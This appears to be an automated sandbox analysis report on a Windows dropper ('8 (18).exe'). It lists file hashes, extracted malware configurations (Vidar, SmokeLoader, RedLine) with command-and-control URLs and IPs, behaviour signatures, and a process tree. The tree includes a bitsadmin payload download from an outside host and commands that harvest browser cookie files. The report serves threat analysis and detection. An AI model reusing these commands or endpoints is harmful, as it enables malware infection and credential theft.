Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-08-2021 09:42

General

  • Target

    8 (18).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

SewPalpadin

C2

185.215.113.114:8887

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 36 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 53 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2856
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2804
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2796
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2540
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2504
            • C:\Users\Admin\AppData\Local\Temp\8 (18).exe
              "C:\Users\Admin\AppData\Local\Temp\8 (18).exe"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:772
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2828
                • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\setup_install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:3164
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1120
                    • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_1.exe
                      sonia_1.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2548
                      • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_1.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_1.exe" -a
                        6⤵
                        • Executes dropped EXE
                        PID:1504
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3384
                    • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_2.exe
                      sonia_2.exe
                      5⤵
                      • Executes dropped EXE
                      PID:2812
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1116
                    • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_3.exe
                      sonia_3.exe
                      5⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:1604
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 1648
                        6⤵
                        • Suspicious use of NtCreateProcessExOtherParentProcess
                        • Program crash
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4988
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                    4⤵
                      PID:3968
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4008
                      • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_6.exe
                        sonia_6.exe
                        5⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of WriteProcessMemory
                        PID:2488
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                          • Executes dropped EXE
                          PID:4168
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                          • Executes dropped EXE
                          PID:5052
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                            PID:3216
                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            6⤵
                              PID:3984
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2104
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_4.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2128
                          • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_4.exe
                            sonia_4.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3960
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 528
                          4⤵
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1908
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1964
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1376
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                        1⤵
                          PID:1352
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                          1⤵
                          • Modifies registry class
                          PID:1180
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1172
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:344
                            • C:\Users\Admin\AppData\Roaming\vtcjrfe
                              C:\Users\Admin\AppData\Roaming\vtcjrfe
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:5612
                            • \??\c:\windows\system\svchost.exe
                              c:\windows\system\svchost.exe
                              2⤵
                                PID:3432
                              • C:\Users\Admin\AppData\Roaming\vtcjrfe
                                C:\Users\Admin\AppData\Roaming\vtcjrfe
                                2⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:5276
                              • C:\Users\Admin\AppData\Roaming\hvcjrfe
                                C:\Users\Admin\AppData\Roaming\hvcjrfe
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:4140
                                • C:\Users\Admin\AppData\Roaming\hvcjrfe
                                  C:\Users\Admin\AppData\Roaming\hvcjrfe
                                  3⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3292
                              • C:\Windows\system32\rundll32.exe
                                C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll",KGCToQuEL
                                2⤵
                                • Windows security modification
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                PID:3416
                              • C:\Users\Admin\AppData\Roaming\udcjrfe
                                C:\Users\Admin\AppData\Roaming\udcjrfe
                                2⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:5220
                              • \??\c:\windows\system\svchost.exe
                                c:\windows\system\svchost.exe
                                2⤵
                                  PID:4640
                                • C:\Users\Admin\AppData\Roaming\hvcjrfe
                                  C:\Users\Admin\AppData\Roaming\hvcjrfe
                                  2⤵
                                  • Suspicious use of SetThreadContext
                                  PID:3776
                                  • C:\Users\Admin\AppData\Roaming\hvcjrfe
                                    C:\Users\Admin\AppData\Roaming\hvcjrfe
                                    3⤵
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:2376
                                • C:\Users\Admin\AppData\Roaming\vtcjrfe
                                  C:\Users\Admin\AppData\Roaming\vtcjrfe
                                  2⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:4396
                                • C:\Users\Admin\AppData\Roaming\udcjrfe
                                  C:\Users\Admin\AppData\Roaming\udcjrfe
                                  2⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:5484
                                • \??\c:\windows\system\svchost.exe
                                  c:\windows\system\svchost.exe
                                  2⤵
                                    PID:5612
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                  1⤵
                                    PID:996
                                  • \??\c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                    1⤵
                                    • Suspicious use of SetThreadContext
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:2408
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                      2⤵
                                      • Checks processor information in registry
                                      • Modifies data under HKEY_USERS
                                      • Modifies registry class
                                      PID:4356
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                      2⤵
                                      • Drops file in System32 directory
                                      • Checks processor information in registry
                                      • Modifies data under HKEY_USERS
                                      • Modifies registry class
                                      PID:4952
                                  • C:\Users\Admin\AppData\Local\Temp\7zSC0B22864\sonia_5.exe
                                    sonia_5.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:2064
                                    • C:\Users\Admin\Documents\Vt1PIroMdSlkgQcPzPBBbSte.exe
                                      "C:\Users\Admin\Documents\Vt1PIroMdSlkgQcPzPBBbSte.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1588
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        3⤵
                                          PID:4556
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            4⤵
                                            • Kills process with taskkill
                                            PID:5424
                                      • C:\Users\Admin\Documents\Zb2IzTtNUEdN9V5BjTKM2jDL.exe
                                        "C:\Users\Admin\Documents\Zb2IzTtNUEdN9V5BjTKM2jDL.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4188
                                      • C:\Users\Admin\Documents\wWLDVaCcuvklZisYfFvrf2J6.exe
                                        "C:\Users\Admin\Documents\wWLDVaCcuvklZisYfFvrf2J6.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4176
                                      • C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe
                                        "C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:352
                                        • C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe
                                          "C:\Users\Admin\Documents\qgZVcOY3go4i6Wm4t8lJ6Jw1.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:5076
                                      • C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe
                                        "C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe"
                                        2⤵
                                          PID:4364
                                          • C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe
                                            "C:\Users\Admin\Documents\ZoouV5XRzjbMesiE1KsybRRj.exe" -a
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2736
                                        • C:\Users\Admin\Documents\mzNWgNBrl3DIYnEH7SM4LJc0.exe
                                          "C:\Users\Admin\Documents\mzNWgNBrl3DIYnEH7SM4LJc0.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          PID:4252
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                            3⤵
                                              PID:5080
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                              3⤵
                                                PID:5372
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                3⤵
                                                  PID:1124
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                  3⤵
                                                    PID:5164
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                    3⤵
                                                      PID:5200
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                      3⤵
                                                        PID:5592
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                        3⤵
                                                          PID:1948
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                          3⤵
                                                          • Download via BitsAdmin
                                                          PID:5516
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9yxuhzdcsCQOsR1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:484
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peUceGKxekxxDSRT -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:6052
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                          3⤵
                                                            PID:6120
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                            3⤵
                                                              PID:6060
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                              3⤵
                                                                PID:4456
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                                3⤵
                                                                  PID:6124
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                                  3⤵
                                                                    PID:5624
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                                    3⤵
                                                                    • Loads dropped DLL
                                                                    PID:5516
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                                      4⤵
                                                                        PID:4360
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                                      3⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:5808
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                                      3⤵
                                                                        PID:5484
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                                        3⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:1948
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                                        3⤵
                                                                          PID:3884
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxF0CB.tmp\tempfile.ps1"
                                                                          3⤵
                                                                            PID:500
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:4272
                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            PID:4692
                                                                        • C:\Users\Admin\Documents\AIQ61JjivcsG7wd5lJOWMAbC.exe
                                                                          "C:\Users\Admin\Documents\AIQ61JjivcsG7wd5lJOWMAbC.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:2376
                                                                        • C:\Users\Admin\Documents\tbMIuu791B_hR1ALFmQvVpHn.exe
                                                                          "C:\Users\Admin\Documents\tbMIuu791B_hR1ALFmQvVpHn.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies registry class
                                                                          PID:2268
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:2576
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4260
                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                              PID:5604
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              3⤵
                                                                                PID:5256
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                  PID:2896
                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                    PID:5800
                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    3⤵
                                                                                      PID:4192
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                        PID:5040
                                                                                    • C:\Users\Admin\Documents\LSipwjNvv1vmWJlhrYXlSmyp.exe
                                                                                      "C:\Users\Admin\Documents\LSipwjNvv1vmWJlhrYXlSmyp.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      PID:4788
                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops startup file
                                                                                        PID:3544
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
